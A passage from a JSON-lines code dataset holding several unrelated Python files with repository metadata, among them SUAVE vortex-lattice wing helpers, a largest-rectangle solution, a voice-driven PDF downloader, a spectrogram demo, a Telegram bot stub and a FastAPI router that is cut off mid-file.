path, val):\n \"\"\" This is similar to the deep_set function, but also creates\n intermediate Data() objects for keys that do not yet exist. Special\n copy cases are made for paths that lead to large class objects\n \"\"\"\n special_case_keys = ['control_surfaces', 'Segments']\n keys = path.split('.')\n key = keys[0]\n if len(keys) == 1:\n if key in special_case_keys:\n data_obj[key] = copy_large_container(val, key) # will eventually recurse back to this function\n else:\n data_obj[key] = deepcopy(val) # at this point, should only be copying primitive types or very small Data objects\n return\n \n has_key = key in data_obj.keys()\n if not has_key:\n data_obj[key] = Data()\n \n new_path = '.'.join(keys[1:])\n recursive_set(data_obj[key], new_path, val)\n\ndef get_paths(type_str):\n \"\"\" This returns a list of the paths to the attributes needed in VLM\n for a given type of object.\n \n Note that if any element in the paths array is the same as the array's correponding type_str, \n this will cause copy_large_container() to recurse infinitely. It will also recurse infinitely \n if any element in the current array is the same as a type_str that corresponds to a different array\n which itself has an element that is the same as the current type_str. \n \n Inputs:\n type_str - \"wings\", \"control_surfaces\" or \"Segments\"\n \"\"\" \n if type_str == 'wings':\n paths = ['tag',\n 'origin',\n 'symmetric',\n 'vertical',\n 'taper',\n 'dihedral',\n 'thickness_to_chord',\n 'spans.projected',\n 'chords.root',\n 'chords.tip',\n 'sweeps.quarter_chord',\n 'sweeps.leading_edge',\n 'twists.root',\n 'twists.tip',\n 'vortex_lift',\n 'Airfoil',\n 'Segments',\n 'control_surfaces',\n ]\n elif type_str == 'control_surfaces':\n paths = ['tag', \n 'span', \n 'span_fraction_start',\n 'span_fraction_end', \n 'hinge_fraction', \n 'chord_fraction', \n 'sign_duplicate',\n 'deflection', \n 'configuration_type', \n 'gain', \n ]\n elif type_str == 'Segments':\n paths = ['tag', \n 'percent_span_location', \n 'twist',\n 'root_chord_percent', \n 'dihedral_outboard', \n 'thickness_to_chord', \n 'sweeps.quarter_chord', \n 'sweeps.leading_edge', \n 'Airfoil', \n ] \n \n return paths\n\n# ------------------------------------------------------------------\n# wing helper functions\n# ------------------------------------------------------------------ \ndef make_cs_wing_from_cs(cs, seg_a, seg_b, wing, cs_ID):\n \"\"\" This uses a control surface and the segment it lies between to create\n an equilvalent wing object. The wing has a couple of non-standard attributes\n that contain information about the control surface it came from\n\n Assumptions: \n None\n\n Source: \n None\n \n Inputs: \n cs - a control surface object\n seg_a - the segment object inboard of the cs\n seg_b - the segment object outboard of the cs. The cs is also attached to this\n wing - the wing object which owns seg_a and seg_b\n cs_ID - a unique identifier for the cs_wing\n \n Outputs:\n cs_wing - a Data object with relevant Wing and Control_Surface attributes\n \n Properties Used:\n N/A\n \"\"\" \n hspan = wing.spans.projected*0.5 if wing.symmetric else wing.spans.projected\n \n cs_wing = copy_data_from_paths(SUAVE.Components.Wings.Wing(), get_paths(\"wings\"))\n \n #standard wing attributes--------------------------------------------------------------------------------------\n cs_wing.tag = wing.tag + '__cs_id_{}'.format(cs_ID)\n span_a = seg_a.percent_span_location\n span_b = seg_b.percent_span_location\n twist_a = seg_a.twist\n twist_b = seg_b.twist\n cs_wing.twists.root = np.interp(cs.span_fraction_start, [span_a, span_b], [twist_a, twist_b])\n cs_wing.twists.tip = np.interp(cs.span_fraction_end, [span_a, span_b], [twist_a, twist_b])\n cs_wing.dihedral = seg_a.dihedral_outboard\n cs_wing.thickness_to_chord = (seg_a.thickness_to_chord + seg_b.thickness_to_chord)/2\n cs_wing.origin = np.array(wing.origin) *1.\n \n span_fraction_tot = cs.span_fraction_end - cs.span_fraction_start\n cs_wing.spans.projected = wing.spans.projected * span_fraction_tot #includes 2x length if cs is on a symmetric wing \n \n wing_chord_local_at_cs_root = np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.chord, seg_b.chord])\n wing_chord_local_at_cs_tip = np.interp(cs.span_fraction_end, [span_a, span_b], [seg_a.chord, seg_b.chord])\n cs_wing.chords.root = wing_chord_local_at_cs_root * cs.chord_fraction \n cs_wing.chords.tip = wing_chord_local_at_cs_tip * cs.chord_fraction \n cs_wing.taper = cs_wing.chords.tip / cs_wing.chords.root\n cs_wing.sweeps.quarter_chord = 0. # leave at 0. VLM will use leading edge\n\n cs_wing.symmetric = wing.symmetric\n cs_wing.vertical = wing.vertical\n cs_wing.vortex_lift = wing.vortex_lift\n\n #non-standard wing attributes, mostly to do with cs_wing's identity as a control surface-----------------------\n #metadata\n cs_wing.is_a_control_surface = True\n cs_wing.cs_ID = cs_ID\n cs_wing.name = wing.tag + '__' + seg_b.tag + '__' + cs.tag + '__cs_ID_{}'.format(cs_ID)\n cs_wing.is_slat = (cs.cs_type==Slat)\n cs_wing.is_aileron = (cs.cs_type==Aileron)\n cs_wing.pivot_edge = 'TE' if cs_wing.is_slat else 'LE'\n \n #control surface attributes\n cs_wing.chord_fraction = cs.chord_fraction\n cs_wing.hinge_fraction = cs.hinge_fraction\n cs_wing.sign_duplicate = cs.sign_duplicate\n cs_wing.deflection = cs.deflection\n cs_wing.deflection_last = 0.\n \n #adjustments---------------------------------------------------------------------------------------------------\n #adjust origin - may need to be adjusted later\n wing_halfspan = wing.spans.projected * 0.5 if wing.symmetric else wing.spans.projected\n LE_TE_cs_offset = 0. if cs_wing.is_slat else (1 - cs.chord_fraction)*wing_chord_local_at_cs_root\n cs_wing.origin[0,0] += np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.x_offset, seg_b.x_offset]) + LE_TE_cs_offset\n cs_wing.origin[0,1] += cs.span_fraction_start * wing_halfspan if not wing.vertical else np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.dih_offset, seg_b.dih_offset])\n cs_wing.origin[0,2] += np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.dih_offset, seg_b.dih_offset]) if not wing.vertical else cs.span_fraction_start * wing_halfspan\n \n # holds all required y-coords. Will be added to during discretization to ensure y-coords match up between wing and control surface.\n rel_offset = cs_wing.origin[0,1] - wing.origin[0][1] if not cs_wing.vertical else cs_wing.origin[0,2] - wing.origin[0][2]\n cs_wing.y_coords_required = [cs.span_fraction_end*hspan - rel_offset] #initialize with the tip y-coord. Other coords to be added in VLM\n\n #find sweep of the 'outside' edge (LE for slats, TE for everything else)\n use_le_sweep = not (seg_a.sweeps.leading_edge is None)\n new_cf = 0. if cs_wing.is_slat else 1\n old_cf = 0. if use_le_sweep else 0.25\n old_sweep = seg_a.sweeps.leading_edge if use_le_sweep else seg_a.sweeps.quarter_chord\n new_sweep = convert_sweep_segments(old_sweep, seg_a, seg_b, wing, old_ref_chord_fraction=old_cf, new_ref_chord_fraction=new_cf)\n cs_wing.outside_sweep = new_sweep\n \n #find leading edge sweep\n if cs_wing.is_slat:\n cs_wing.sweeps.leading_edge = new_sweep\n else:\n new_cf = 1 - cs_wing.chord_fraction\n new_sweep = convert_sweep_segments(old_sweep, seg_a, seg_b, wing, old_ref_chord_fraction=old_cf, new_ref_chord_fraction=new_cf)\n cs_wing.sweeps.leading_edge = new_sweep\n \n #convert to segmented wing-------------------------------------------------------------------------------------\n cs_wing = convert_to_segmented_wing(cs_wing)\n \n # give segments offsets (in coordinates relative to the cs_wing)\n cs_wing.Segments[0].x_offset = 0.\n cs_wing.Segments[0].dih_offset = 0. \n cs_wing.Segments[1].x_offset = wing_halfspan * span_fraction_tot *np.tan(cs_wing.Segments[0].sweeps.leading_edge)\n cs_wing.Segments[1].dih_offset = wing_halfspan * span_fraction_tot *np.tan(cs_wing.Segments[0].dihedral_outboard) \n \n #add airfoil\n cs_wing.Segments[0].Airfoil = seg_a.Airfoil\n cs_wing.Segments[1].Airfoil = seg_b.Airfoil if cs.span_fraction_end==span_b else seg_a.Airfoil\n \n return cs_wing\n\ndef convert_to_segmented_wing(wing):\n \"\"\" This turns a non-segmented wing into a segmented wing\n\n Assumptions: \n If a given wing has no segments, it must have either .taper or .chords.tip defined\n\n Source: \n None\n \n Inputs: \n VD - vortex distribution \n geometry.\n wings.wing.\n twists.root\n twists.tip\n dihedral\n sweeps.quarter_chord\n thickness_to_chord\n taper\n chord.root\n chords.tip\n \n Properties Used:\n N/A\n \"\"\" \n if len(wing.Segments.keys()) > 0:\n return wing \n # root segment \n segment = SUAVE.Components.Wings.Segment()\n segment.tag = 'root_segment'\n segment.percent_span_location = 0.0\n segment.twist = wing.twists.root\n segment.root_chord_percent = 1.\n segment.chord = wing.chords.root #non-standard attribute, needed for VLM\n segment.dihedral_outboard = wing.dihedral\n segment.sweeps.quarter_chord = wing.sweeps.quarter_chord\n segment.sweeps.leading_edge = wing.sweeps.leading_edge\n segment.thickness_to_chord = wing.thickness_to_chord\n if wing.Airfoil: \n segment.append_airfoil(wing.Airfoil.airfoil) \n wing.Segments.append(segment) \n \n # tip segment \n if wing.taper==0:\n wing.taper = wing.chords.tip / wing.chords.root\n elif wing.chords.tip==0:\n wing.chords.tip = wing.chords.root * wing.taper\n \n segment = SUAVE.Components.Wings.Segment()\n segment.tag = 'tip_segment'\n segment.percent_span_location = 1.\n segment.twist = wing.twists.tip\n segment.root_chord_percent = wing.taper\n segment.chord = wing.chords.tip #non-standard attribute, needed for VLM\n segment.dihedral_outboard = 0.\n segment.sweeps.quarter_chord = 0.\n segment.sweeps.leading_edge = 1e-8\n segment.thickness_to_chord = wing.thickness_to_chord\n if wing.Airfoil: \n segment.append_airfoil(wing.Airfoil.airfoil) \n wing.Segments.append(segment) \n \n return wing\n\n# ------------------------------------------------------------------\n# span_break processing helper functions\n# ------------------------------------------------------------------ \ndef add_span_break(span_break, span_breaks):\n \"\"\" This is a helper function that appends or superimposes a span_break \n into span_breaks\n\n Assumptions: \n None\n\n Source: \n None\n \n Inputs: \n span_break\n span_breaks\n \n Properties Used:\n N/A\n \"\"\" \n if len(span_breaks) == 0:\n span_breaks.append(span_break)\n else:\n # if non-coincident, the space between the breaks is nominal wing: append the new span_break\n if span_breaks[-1].span_fraction < span_break.span_fraction: \n span_breaks.append(span_break)\n \n # else coincident: need to superimpose cs_IDs and cuts, not append\n else:\n boolean = span_breaks[-1].cs_IDs==-1\n span_breaks[-1].cs_IDs[boolean] = span_break.cs_IDs[boolean]\n span_breaks[-1].cuts[boolean] = span_break.cuts[boolean]\n \n return\n\n\ndef reprocess_span_breaks(span_breaks):\n \"\"\" This reprocesses the tags in a newly superimposed set of\n span_breaks and creates a new object so that the new keys match \n the new tags\n \n Inputs:\n span_breaks\n \"\"\" \n sbs = SUAVE.Core.ContainerOrdered()\n for i,span_break in enumerate(span_breaks):\n span_break.tag = make_span_break_tag(span_break)\n sbs.append(span_break)\n return sbs\n\n# ------------------------------------------------------------------\n# span_break creation helper functions\n# ------------------------------------------------------------------ \ndef make_span_break_from_segment(seg):\n \"\"\" This creates a span_break Data() object from a segment\n\n Assumptions: \n None\n\n Source: \n None\n \n Inputs: \n seg - a segment object with standard attributes except for:\n .chord\n \n Properties Used:\n N/A\n \"\"\" \n span_frac = seg.percent_span_location\n Airfoil = seg.Airfoil\n dihedral_ob = seg.dihedral_outboard\n sweep_ob_QC = seg.sweeps.quarter_chord\n sweep_ob_LE = seg.sweeps.leading_edge\n twist = seg.twist \n local_chord = seg.chord #non-standard attribute\n x_offset = seg.x_offset\n dih_offset = seg.dih_offset \n span_break = make_span_break(-1, 0, 0, span_frac, 0., Airfoil,\n dihedral_ob, sweep_ob_QC, sweep_ob_LE, twist, local_chord,\n x_offset, dih_offset) \n span_break.cuts = np.array([[0.,0.], \n [1.,1.]])\n return span_break\n\ndef make_span_breaks_from_cs(cs, seg_a, seg_b, cs_wing, cs_ID):\n \"\"\" This creates span_break Data() objects from a control surface, its\n owning segments, and their owning cs_wing\n\n Assumptions: \n None\n\n Source: \n None\n \n Inputs: \n cs - a control surface object\n seg_a - the segment object inboard of the cs\n seg_b - the segment object outboard of the cs. The cs is also attached to this\n cs_wing - the wing object which owns seg_a and seg_b\n cs_ID - a unique identifier for the cs_wing\n \n Properties Used:\n N/A\n \"\"\" \n is_slat = (cs.cs_type==Slat)\n LE_TE = 0 if is_slat else 1\n span_a = seg_a.percent_span_location\n span_b = seg_b.percent_span_location \n \n #inboard span break\n ib_ob = 1 #the inboard break of the cs is the outboard part of the span_break\n span_frac = cs.span_fraction_start \n ob_cut = cs.chord_fraction if is_slat else 1 - cs.chord_fraction\n Airfoil = seg_a.Airfoil\n dihedral_ob = seg_a.dihedral_outboard\n sweep_ob_QC = seg_a.sweeps.quarter_chord\n sweep_ob_LE = seg_a.sweeps.leading_edge\n twist = cs_wing.twists.root \n local_chord = cs_wing.chords.root / cs.chord_fraction\n x_offset = np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.x_offset, seg_b.x_offset])\n dih_offset = np.interp(cs.span_fraction_start, [span_a, span_b], [seg_a.dih_offset, seg_b.dih_offset])\n inboard_span_break = make_span_break(cs_ID, LE_TE, ib_ob, span_frac, ob_cut, Airfoil,\n dihedral_ob, sweep_ob_QC, sweep_ob_LE, twist, local_chord,\n x_offset, dih_offset)\n \n #outboard span break\n is_coincident = (cs.span_fraction_end==seg_b.percent_span_location)\n ib_ob = 0 #the outboard break of the cs is the inboard part of the span_break\n span_frac = cs.span_fraction_end\n ib_cut = cs.chord_fraction if is_slat else 1 - cs.chord_fraction\n Airfoil = seg_b.Airfoil if is_coincident else seg_a.Airfoil #take seg_b value if this outboard break is conicident with seg_b \n dihedral_ob = seg_b.dihedral_outboard if is_coincident else seg_a.dihedral_outboard\n sweep_ob_QC = seg_b.sweeps.quarter_chord if is_coincident else seg_a.sweeps.quarter_chord\n sweep_ob_LE = seg_b.sweeps.leading_edge if is_coincident else seg_a.sweeps.leading_edge\n twist = cs_wing.twists.tip \n local_chord = cs_wing.chords.tip / cs.chord_fraction\n x_offset = np.interp(cs.span_fraction_end, [span_a, span_b], [seg_a.x_offset, seg_b.x_offset])\n dih_offset = np.interp(cs.span_fraction_end, [span_a, span_b], [seg_a.dih_offset, seg_b.dih_offset]) \n outboard_span_break = make_span_break(cs_ID, LE_TE, ib_ob, span_frac, ib_cut, Airfoil,\n dihedral_ob, sweep_ob_QC, sweep_ob_LE, twist, local_chord,\n x_offset, dih_offset) \n return inboard_span_break, outboard_span_break\n\ndef make_span_break(cs_ID, LE_TE, ib_ob, span_frac, chord_cut, Airfoil,\n dihedral_ob, sweep_ob_QC, sweep_ob_LE, twist, local_chord,\n x_offset, dih_offset):\n \"\"\" This gathers information related to a span break into one Data() object.\n A span break is the spanwise location of a discontinuity in the discretization\n of the panels. These can be caused by segments and by the inboard and outboard \n edges of a control surface. The inboard and outboard sides of a span break can\n have different chords due to cuts made by control surfaces. Ultimately, the\n attributes of the span_breaks of the wing will provide the discretization function \n generate_wing_vortex_distribution() with the necessary values to make VLM panels\n as well as reshape those panels to make the control surface cuts dipicted below.\n \n A diagram is given below:\n\n\n nominal local chord\n fuselage inboard LE | | . outboard LE\n <--- | | . \n | | .\n | | . <-- cut from a slat\n | | |\n | | |\n | | |\n | | |\n | | |\n | | |\n | | |\n | | . <-- cut from a non-slat control surface with a different chord \ncut from a non-slat control surface | | . fraction than the control surface on the inboard side\n --> . | .\n . | .\n inboard TE . | . outboard TE\n \n \n \n |_______________________|\n |\n there is 0 spanwise \n distance between inboard \n and outboard sides\n\n Outputs:\n span_break\n \n Properties Used:\n N/A\n \"\"\" \n span_break = Data()\n span_break.cs_IDs = np.array([[-1,-1], # [[inboard LE cs, outboard LE cs],\n [-1,-1]]) # [inboard TE cs, outboard TE cs]]\n span_break.cs_IDs[LE_TE,ib_ob] = cs_ID\n span_break.span_fraction = span_frac\n # The following 'cut' attributes are in terms of the local total chord and represent positions. \n # (an aileron with chord fraction 0.2 would have a cut value of 0.8)\n # For inboard_cut, -1 takes value of previous outboard cut value in a later function\n # For outboard_cut, -1 takes value of next inboard cut value.\n # If no break directly touching this one, cut becomes 0 (LE) or 1 (TE).\n span_break.cuts = np.array([[0.,0.], # [[inboard LE cut, outboard LE cut],\n [1.,1.]]) # [inboard TE cut, outboard TE cut]]\n span_break.cuts[LE_TE,ib_ob] = chord_cut\n span_break.Airfoil = Airfoil\n span_break.dihedral_outboard = dihedral_ob\n span_break.sweep_outboard_QC = sweep_ob_QC\n span_break.sweep_outboard_LE = sweep_ob_LE\n span_break.twist = twist\n span_break.local_chord = local_chord #this is the local chord BEFORE cuts are made\n span_break.x_offset = x_offset\n span_break.dih_offset = dih_offset #dih_offset is the y or z accumulated offset from dihedral\n span_break.tag = make_span_break_tag(span_break)\n return span_break\n\ndef make_span_break_tag(span_break):\n location = round(span_break.span_fraction, 3)\n cs_IDs_arr = span_break.cs_IDs.flatten()\n cs_IDs_str = '{}'.format(cs_IDs_arr).replace('[','').replace(']','').replace('-1', 'na').replace(' ', '_')\n \n return \"{}___{}\".format(location, cs_IDs_str)\n","repo_name":"suavecode/SUAVE","sub_path":"trunk/SUAVE/Methods/Aerodynamics/Common/Fidelity_Zero/Lift/make_VLM_wings.py","file_name":"make_VLM_wings.py","file_ext":"py","file_size_in_byte":36358,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"61"} +{"seq_id":"18554728575","text":"def getSize(height, start, end):\n return height*(end-start)\n\nn = int(input())\nhist = list(map(int,input().split()))\n\npositions = []\nheights = []\n# stack[-1] is always the top of the stack, like stack.peek()\n# https://www.youtube.com/watch?v=VNbkzsnllsU\n# https://www.youtube.com/watch?v=ZmnqCZp9bBs\n# https://www.hackerrank.com/challenges/largest-rectangle/editorial\nmaxArea = 0\n#for position, height in enumerate(hist):\nfor position in range(0,len(hist)):\n height = hist[position]\n if (len(heights)==0):\n positions.append(position)\n heights.append(height)\n elif (height > heights[-1]): # hacky way to avoid using extra variable\n positions.append(position)\n heights.append(height)\n elif height < heights[-1]:\n # Pop as long as the stack is not empty and the examined value is less than the current stack top\n while (len(heights) and height < heights[-1]):\n start = positions.pop()\n currHeight = heights.pop()\n size = getSize(currHeight, start, position)\n # print(size)\n if size > maxArea:\n maxArea = size\n if (not len(heights) or height > heights[-1]):\n heights.append(height)\n positions.append(start)\n# Used to clean up the stack\nwhile (len(heights)):\n start = positions.pop()\n currHeight = heights.pop()\n size = getSize(currHeight, start, n) # size from stack end compared to the value popped\n if size > maxArea:\n maxArea = size\n\nprint(maxArea)\n","repo_name":"gakonst/Challenges","sub_path":"Hackerrank/DataStructures/Stacks/largestRectangle.py","file_name":"largestRectangle.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"4986720840","text":"import os\nimport re\nimport requests\nimport speech_recognition as sr\nfrom datetime import datetime\nfrom googlesearch import search\nfrom TTS import speak\nfrom _approve import _approve\n\n\ndef sanitize_and_get_user_query():\n r = sr.Recognizer()\n query = \"\"\n try:\n with sr.Microphone() as source:\n r.adjust_for_ambient_noise(source)\n r.energy_threshold = 200\n r.pause_threshold = 0.5\n \n while True:\n speak(\"What would you like to research about?\")\n audio = r.listen(source, timeout=10)\n query = r.recognize_google(audio)\n \n approval = _approve(query) # Add the approval check\n \n if approval:\n break\n else:\n speak(\"Sorry, the query you provided is not approved. Please try again.\")\n except sr.WaitTimeoutError:\n print(\"Timeout error: the speech recognition operation timed out\")\n except sr.UnknownValueError:\n speak(\"Sorry, I could not understand your query. Please try again.\")\n except sr.RequestError as e:\n speak(f\"Could not request results from the speech recognition service; check your internet connection: {e}\")\n except Exception as e:\n speak(f\"An error occurred: {e}\")\n \n return re.sub(r'(?u)[^-\\w.]', '', query)\n\n\ndef download_pdf_files(max_results=4, base_directory='./pdfs'):\n keyword = sanitize_and_get_user_query()\n\n today = datetime.today().strftime('%Y-%m-%d')\n directory = os.path.join(base_directory, today)\n os.makedirs(directory, exist_ok=True)\n\n query = keyword + \" filetype:pdf\"\n speak(\"Initializing downloads from the internet. This may take sometime depending on your internet speed. in the meantime relax and wait for response.\")\n for url in search(query, num_results=max_results):\n try:\n response = requests.get(url, timeout=15)\n except requests.exceptions.RequestException as err:\n print(f\"Couldn't download file {url}. Error: {err}\")\n continue\n\n if response.headers['content-type'] == 'application/pdf':\n filename = os.path.basename(url)\n if not os.path.isfile(os.path.join(directory, filename)):\n try:\n with open(os.path.join(directory, filename), 'wb') as f:\n f.write(response.content)\n speak(f\"Downloaded {filename}\")\n except Exception as err:\n print(f\"Couldn't write file {filename}. Error: {err}\")\n continue\n\n speak(f\"Downloaded files successfully\")\n\n# if __name__ == \"__main__\":\n# download_pdf_files(max_results=15)\n","repo_name":"marvins56/GPT-4-BLIND-PERSONS","sub_path":"hackathon/newSerach.py","file_name":"newSerach.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"31943681589","text":"import scipy.io.wavfile as wav\r\nimport matplotlib.pyplot as plt\r\n\r\nimport numpy as np\r\nfrom scipy.fftpack import fft\r\n\r\n\r\n# 输出音频波形\r\nfilepath = 'test.wav'\r\n#fs采样频率 wavsigal音频数据\r\nfs, wavsignal = wav.read(filepath)\r\nprint(type(wavsignal))\r\nprint(wavsignal.shape)\r\nplt.plot(wavsignal)\r\nplt.show()\r\n\r\n#构造hamming window\r\nx=np.linspace(0, 400 - 1, 400, dtype = np.int64)#返回区间内的均匀数字\r\n# print(x)\r\nw = 0.54 - 0.46 * np.cos(2 * np.pi * (x) / (400 - 1))\r\nplt.plot(w)\r\nplt.show()\r\n\r\n#对数据分帧\r\n'''\r\n帧长: 25ms\r\n帧移: 10ms\r\n采样点(s) = fs\r\n采样点(ms)= fs / 1000\r\n采样点(帧)= fs / 1000 * 帧长\r\n'''\r\ntime_window = 25\r\nwindow_length = fs // 1000 * time_window\r\n#保持window\r\n\r\n# 分帧\r\np_begin = 0\r\np_end = p_begin + window_length\r\nframe = wavsignal[p_begin:p_end]\r\n\r\nplt.figure(figsize=(15, 5))\r\nax4 = plt.subplot(121)\r\nplt.title('the original picture of one frame')\r\nplt.plot(frame)\r\n\r\n# plt.show()\r\n# 加窗\r\n\r\nframe = frame * w\r\nax5 = plt.subplot(122)\r\nplt.title('after hanmming')\r\nplt.plot(frame)\r\nplt.show()\r\n\r\n# 进行快速傅里叶变换\r\nframe_fft = np.abs(fft(frame))[:200]\r\nplt.plot(frame_fft)\r\nplt.show()\r\n\r\n# 取对数,求db\r\nframe_log = np.log(frame_fft)\r\nplt.plot(frame_log)\r\nplt.show()\r\n\r\n# 获取信号的时频图\r\ndef compute_fbank(file):\r\n x=np.linspace(0, 400 - 1, 400, dtype = np.int64)\r\n # 汉明窗\r\n w = 0.54 - 0.46 * np.cos(2 * np.pi * (x) / (400 - 1) )\r\n fs, wavsignal = wav.read(file)\r\n # wav波形 加时间窗以及时移10ms\r\n time_window = 25 # 单位ms\r\n # 计算窗长度的公式,目前全部为400固定值\r\n window_length = fs / 1000 * time_window\r\n wav_arr = np.array(wavsignal)\r\n wav_length = len(wavsignal)\r\n # 计算循环终止的位置,也就是最终生成的窗数\r\n range0_end = int(len(wavsignal)/fs*1000 - time_window) // 10\r\n # \tprint(range0_end)\r\n # 用于存放最终的频率特征数据\r\n data_input = np.zeros((range0_end, 200), dtype = np.float)\r\n # 窗口内的数据\r\n data_line = np.zeros((1, 400), dtype = np.float)\r\n for i in range(0, range0_end):\r\n p_start = i * 160 # 步长10ms\r\n p_end = p_start + 400 # 窗口长25ms\r\n data_line = wav_arr[p_start:p_end]\r\n data_line = data_line * w # 加窗\r\n data_line = np.abs(fft(data_line))\r\n data_input[i]=data_line[0:200] # 设置为400除以2的值(即200)是取一半数据,因为是对称的\r\n data_input = np.log(data_input + 1)\r\n #data_input = data_input[::]\r\n return data_input\r\n\r\n\r\n\r\n\r\na = compute_fbank(filepath)\r\nprint(a.shape)\r\nplt.imshow(a.T, origin = 'lower')\r\nplt.show()\r\n","repo_name":"Michelingweo/Audio-Recognition","sub_path":"timefreqfig.py","file_name":"timefreqfig.py","file_ext":"py","file_size_in_byte":2688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23890101415","text":"import sys\nfrom config import DB_DETAILS\nfrom util import get_tables\ndef main():\n \"\"\"Pass one argument\"\"\"\n env = sys.argv[1]\n db_details = DB_DETAILS[env]\n tables = get_tables('table_list')\n for table in tables['table_name']:\n print(table)\n # print(idx)\nif __name__ == '__main__':\n main()","repo_name":"Kamal-byte/data-copier-live","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9300114383","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Sep 27 11:31:17 2019\r\n\r\n@author: kjoseph\r\n\"\"\"\r\n\r\nimport pandas as pd\r\n#import numpy as np\r\nimport glob\r\n#import xlwt\r\n#from xlwt import Workbook\r\n#from openpyxl import load_workbook\r\n\r\n\r\nfiles=glob.glob('D:\\\\Test\\\\*.xlsx')## Change Input Location Here. Dont change wildcard operator *.xlsx\r\n\r\n\r\nsheets=['DemandRegion','DemandRequirement','Facility','FacilityInPeriod','InterfacilityLinkInPeriod','ProcessComponent',\r\n 'ProductAtFacilityInPeriod','ServiceLinkInPeriod','TransportationMode','TransportationModeInPeriod']\r\nfile_names=[i[i.find('Scenario'):i.find('.xlsx')] for i in files ]\r\n\r\n\r\nd= ['D:\\\\Test\\\\Answers' for i in file_names]## Give Ouput Location Here\r\n\r\n\r\ntarget=list(map(lambda x,y:x+'\\\\'+y,d,file_names))\r\ntarget=[i+'.xlsx' for i in target]\r\n\r\nl=len(sheets)\r\ncount=0\r\nfor j in files:\r\n #wb=Workbook()\r\n with pd.ExcelWriter(target[count],engine='xlsxwriter') as writer:\r\n for i in sheets:\r\n data=pd.read_excel(j,sheet_name=i)\r\n data.Scenario=data.loc[:,'Scenario'].apply(lambda x:file_names[count])\r\n data.to_excel(writer,sheet_name=i,index=False)\r\n count=count+1\r\n # break\r\n\r\n","repo_name":"KaranJoseph/Chain-SCD","sub_path":"Test/scd.py","file_name":"scd.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11371944307","text":"from models.databasemanager import DatabaseManager\r\nfrom datetime import date , datetime\r\nfrom extract import Extract\r\n\r\ndb_manager = DatabaseManager()\r\n\r\n\r\nclass Extract_Scheduled(Extract):\r\n def __init__(self, money , day):\r\n super().__init__(money)\r\n self.day = day\r\n\r\n def insert_database(self):\r\n\r\n query = \"INSERT INTO moneyscheduled (money, day) VALUES (%s, %s)\"\r\n data = (self.money , self.day)\r\n\r\n db_manager.execute_query_with_data(query , data)\r\n\r\n print(\"dinheiro programado adicionado\")\r\n\r\n def view_date_moneyscheduled():\r\n\r\n\r\n query = \"SELECT * FROM moneyscheduled\"\r\n results = db_manager.return_results(query)\r\n\r\n return results\r\n\r\n def count_register_moneyscheduled():\r\n query = \"SELECT COUNT(money) FROM moneyscheduled\"\r\n results = db_manager.return_results(query)\r\n\r\n return results[0][0]\r\n\r\n \r\n def add_money_moneyscheduled (money, scheduling, count_register):\r\n count_register_loop = count_register - 1\r\n\r\n # Toda vez que o dia da adição de dinheiro progrmada pelo usuário for hoje, adicione as 00:10 do dia\r\n for i in range(0 , count_register_loop , 1):\r\n if(scheduling[i][1] == date.today().day and datetime.now().hour == 0 and datetime.now().minute == 10 and datetime.now().second == 0):\r\n new_extract = scheduling[i][0]\r\n add_new_extract = new_extract + money\r\n \r\n \r\n query = \"UPDATE extract SET bankroll = %s WHERE id = %s\"\r\n data = ( add_new_extract , 0)\r\n\r\n\r\n db_manager.execute_query_with_data(query , data)\r\n \r\n return \"Dinheiro programado adicionado!\"\r\n\r\n \r\n\r\n \r\n \r\n\r\n","repo_name":"Darlan-Almeida/controle_de_gastos","sub_path":"controle_de_gastos/extract_scheduled.py","file_name":"extract_scheduled.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39979370697","text":"#! /home/nathan/.virtualenvs/rollem/bin/python\nimport sys\nimport logging\nfrom telegram.ext import Updater, CommandHandler\n\ndef roll(bot, update):\n bot.send_message(chat_id=update.message.chat_id, text=\"Technical difficulties. Working on a fix now!\")\n\nTOKEN = sys.argv[1]\n\nupdater = Updater(token=TOKEN)\ndispatcher = updater.dispatcher\n\nroll_handler = CommandHandler('roll', roll)\ndispatcher.add_handler(roll_handler)\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nupdater.start_polling()\n","repo_name":"treetrnk/rollem-telegram-bot","sub_path":"tech-diff.py","file_name":"tech-diff.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"61"} +{"seq_id":"74654418434","text":"from fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\n\nfrom ..enums import QuestionType\nfrom ..schemas.question import QuestionItemResponse, QuestionResponse\nfrom ..database.engine import get_db\nfrom ..helpers import question_crud, answer_crud\n\nrouter = APIRouter(\n prefix=\"/question\",\n tags=[\"question\"]\n)\n\n\n@router.get('/', response_model=list[QuestionItemResponse])\ndef get_questions(test_id: int | None = None, db: Session = Depends(get_db)):\n if test_id:\n return question_crud.get_questions_by_test_id(db, test_id)\n return question_crud.get_questions(db)\n\n\n@router.get('/{question_id}', response_model=QuestionResponse)\ndef get_question(question_id: int, test_id: int | None = None, db: Session = Depends(get_db)):\n question = question_crud.get_question_by_id(db, question_id)\n stats = {}\n if question.type != QuestionType.Text.value:\n stats = answer_crud.get_answers_count(db, question, test_id)\n\n return QuestionResponse(\n text=question.text,\n type=question.type,\n stats=stats if len(stats.keys()) != 